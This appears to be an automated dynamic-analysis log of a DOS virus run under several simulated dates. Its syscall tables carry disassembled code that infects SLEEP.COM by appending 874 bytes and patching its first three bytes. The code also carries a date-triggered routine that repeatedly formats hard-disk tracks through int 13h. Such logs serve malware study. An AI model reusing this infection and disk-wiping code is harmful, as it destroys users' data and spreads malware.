{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16338,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T12:52:31.881179725Z | 47 | PC: 12a76 | Get disk transfer address |
| 2018-12-25T12:52:31.882703975Z | 26 | PC: 12a5b | Set disk transfer address |
| 2018-12-25T12:52:31.885410378Z | 42 | PC: 12a83 | Get date 0x12a83: cmp al, 1 0x12a85: jge 0x12a89 0x12a87: jmp 0x12ad3 0x12a89: cmp al, 1 0x12a8b: ja 0x12ad3 0x12a8d: jmp 0x12a8f 0x12a8f: mov dl, 2 0x12a91: mov ah, 5 0x12a93: mov dh, 0x80 0x12a95: mov ch, 0 0x12a97: int 0x13 0x12a99: mov cx, 0x14 0x12a9c: push cx 0x12a9d: call 0x12aaa 0x12aa0: mov cx, 0x4000 0x12aa3: loop 0x12aa3 0x12aa5: pop cx 0x12aa6: loop 0x12a9c 0x12aa8: jmp 0x12a8f 0x12aaa: mov dx, 0x140 |
{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16338,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T12:52:31.935468128Z | 47 | PC: 12a76 | Get disk transfer address |
| 2018-12-25T12:52:31.936958853Z | 26 | PC: 12a5b | Set disk transfer address |
| 2018-12-25T12:52:31.937869992Z | 42 | PC: 12a83 | Get date 0x12a83: cmp al, 1 0x12a85: jge 0x12a89 0x12a87: jmp 0x12ad3 0x12a89: cmp al, 1 0x12a8b: ja 0x12ad3 0x12a8d: jmp 0x12a8f 0x12a8f: mov dl, 2 0x12a91: mov ah, 5 0x12a93: mov dh, 0x80 0x12a95: mov ch, 0 0x12a97: int 0x13 0x12a99: mov cx, 0x14 0x12a9c: push cx 0x12a9d: call 0x12aaa 0x12aa0: mov cx, 0x4000 0x12aa3: loop 0x12aa3 0x12aa5: pop cx 0x12aa6: loop 0x12a9c 0x12aa8: jmp 0x12a8f 0x12aaa: mov dx, 0x140 |
| 2018-12-25T12:52:31.939770751Z | 44 | PC: 12ad7 | Get time 0x12ad7: and dh, 0xf 0x12ada: cmp dh, 3 0x12add: jb 0x12a99 0x12adf: cmp dh, 3 0x12ae2: ja 0x12b0d 0x12ae4: int 0x19 0x12ae6: mov ah, 0x47 0x12ae8: xor dl, dl 0x12aea: add si, 0 0x12aee: int 0x21 0x12af0: jb 0x12b0d 0x12af2: mov ah, 0x3b 0x12af4: mov dx, si 0x12af6: add dx, 0x40 0x12afa: int 0x21 0x12afc: mov word ptr [bx + 0x44], di 0x12aff: mov si, bx 0x12b01: add si, 0x36 0x12b05: mov cx, 6 0x12b08: movsb byte ptr es:[di], byte ptr [si] |
| 2018-12-25T12:52:31.942316357Z | 78 | PC: 12b8c | Find first file |
| 2018-12-25T12:52:31.94794513Z | 67 | PC: 12bcb | Get or set file attributes |
| 2018-12-25T12:52:31.953301414Z | 67 | PC: 12bdb | Get or set file attributes |
| 2018-12-25T12:52:31.964215189Z | 61 | PC: 12be5 | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T12:52:31.970368809Z | 87 | PC: 12bf1 | Get or set file date and time |
| 2018-12-25T12:52:31.971559996Z | 44 | PC: 12bfb | Get time 0x12bfb: and dh, 7 0x12bfe: jmp 0x12c00 0x12c00: mov ah, 0x3f 0x12c02: mov cx, 3 0x12c05: mov dx, 0x2a 0x12c08: add dx, si 0x12c0a: int 0x21 0x12c0c: jb 0x12c67 0x12c0e: cmp ax, 3 0x12c11: jne 0x12c67 0x12c13: mov ax, 0x4202 0x12c16: mov cx, 0 0x12c19: mov dx, 0 0x12c1c: int 0x21 0x12c1e: jb 0x12c67 0x12c20: mov cx, ax 0x12c22: sub ax, 3 0x12c25: mov word ptr [si + 0x2e], ax 0x12c28: add cx, 0x36a 0x12c2c: mov di, si |
| 2018-12-25T12:52:31.97382377Z | 63 | PC: 12c0c | Read file or device (Read 3 bytes on handle 5) |
| 2018-12-25T12:52:31.979709803Z | 66 | PC: 12c1e | Move file pointer |
| 2018-12-25T12:52:31.980904299Z | 64 | PC: 12c46 | Write file or device (Write 874 bytes on handle 5) |
| 2018-12-25T12:52:31.989122437Z | 66 | PC: 12c58 | Move file pointer |
| 2018-12-25T12:52:31.990397164Z | 64 | PC: 12c67 | Write file or device (Write 3 bytes on handle 5) |
| 2018-12-25T12:52:31.996582005Z | 87 | PC: 12c78 | Get or set file date and time |
| 2018-12-25T12:52:31.998366803Z | 62 | PC: 12c7c | Close file |
| 2018-12-25T12:52:32.005819702Z | 67 | PC: 12c89 | Get or set file attributes |
| 2018-12-25T12:52:32.015208036Z | 26 | PC: 12c94 | Set disk transfer address |
{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16338,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T12:52:32.09319277Z | 47 | PC: 12a76 | Get disk transfer address |
| 2018-12-25T12:52:32.095205215Z | 26 | PC: 12a5b | Set disk transfer address |
| 2018-12-25T12:52:32.096402909Z | 42 | PC: 12a83 | Get date 0x12a83: cmp al, 1 0x12a85: jge 0x12a89 0x12a87: jmp 0x12ad3 0x12a89: cmp al, 1 0x12a8b: ja 0x12ad3 0x12a8d: jmp 0x12a8f 0x12a8f: mov dl, 2 0x12a91: mov ah, 5 0x12a93: mov dh, 0x80 0x12a95: mov ch, 0 0x12a97: int 0x13 0x12a99: mov cx, 0x14 0x12a9c: push cx 0x12a9d: call 0x12aaa 0x12aa0: mov cx, 0x4000 0x12aa3: loop 0x12aa3 0x12aa5: pop cx 0x12aa6: loop 0x12a9c 0x12aa8: jmp 0x12a8f 0x12aaa: mov dx, 0x140 |
| 2018-12-25T12:52:32.09851157Z | 44 | PC: 12ad7 | Get time 0x12ad7: and dh, 0xf 0x12ada: cmp dh, 3 0x12add: jb 0x12a99 0x12adf: cmp dh, 3 0x12ae2: ja 0x12b0d 0x12ae4: int 0x19 0x12ae6: mov ah, 0x47 0x12ae8: xor dl, dl 0x12aea: add si, 0 0x12aee: int 0x21 0x12af0: jb 0x12b0d 0x12af2: mov ah, 0x3b 0x12af4: mov dx, si 0x12af6: add dx, 0x40 0x12afa: int 0x21 0x12afc: mov word ptr [bx + 0x44], di 0x12aff: mov si, bx 0x12b01: add si, 0x36 0x12b05: mov cx, 6 0x12b08: movsb byte ptr es:[di], byte ptr [si] |
| 2018-12-25T12:52:32.100765921Z | 78 | PC: 12b8c | Find first file |
| 2018-12-25T12:52:32.107705023Z | 67 | PC: 12bcb | Get or set file attributes |
| 2018-12-25T12:52:32.113955517Z | 67 | PC: 12bdb | Get or set file attributes |
| 2018-12-25T12:52:32.132109589Z | 61 | PC: 12be5 | Open file (Filename = 'SLEEP.COM') |
| 2018-12-25T12:52:32.149336353Z | 87 | PC: 12bf1 | Get or set file date and time |
| 2018-12-25T12:52:32.150788803Z | 44 | PC: 12bfb | Get time 0x12bfb: and dh, 7 0x12bfe: jmp 0x12c00 0x12c00: mov ah, 0x3f 0x12c02: mov cx, 3 0x12c05: mov dx, 0x2a 0x12c08: add dx, si 0x12c0a: int 0x21 0x12c0c: jb 0x12c67 0x12c0e: cmp ax, 3 0x12c11: jne 0x12c67 0x12c13: mov ax, 0x4202 0x12c16: mov cx, 0 0x12c19: mov dx, 0 0x12c1c: int 0x21 0x12c1e: jb 0x12c67 0x12c20: mov cx, ax 0x12c22: sub ax, 3 0x12c25: mov word ptr [si + 0x2e], ax 0x12c28: add cx, 0x36a 0x12c2c: mov di, si |
| 2018-12-25T12:52:32.153013606Z | 63 | PC: 12c0c | Read file or device (Read 3 bytes on handle 5) |
| 2018-12-25T12:52:32.160196583Z | 66 | PC: 12c1e | Move file pointer |
| 2018-12-25T12:52:32.162435519Z | 64 | PC: 12c46 | Write file or device (Write 874 bytes on handle 5) |
| 2018-12-25T12:52:32.171226344Z | 66 | PC: 12c58 | Move file pointer |
| 2018-12-25T12:52:32.172814287Z | 64 | PC: 12c67 | Write file or device (Write 3 bytes on handle 5) |
| 2018-12-25T12:52:32.177278577Z | 87 | PC: 12c78 | Get or set file date and time |
| 2018-12-25T12:52:32.178663879Z | 62 | PC: 12c7c | Close file |
| 2018-12-25T12:52:32.187203984Z | 67 | PC: 12c89 | Get or set file attributes |
| 2018-12-25T12:52:32.200335955Z | 26 | PC: 12c94 | Set disk transfer address |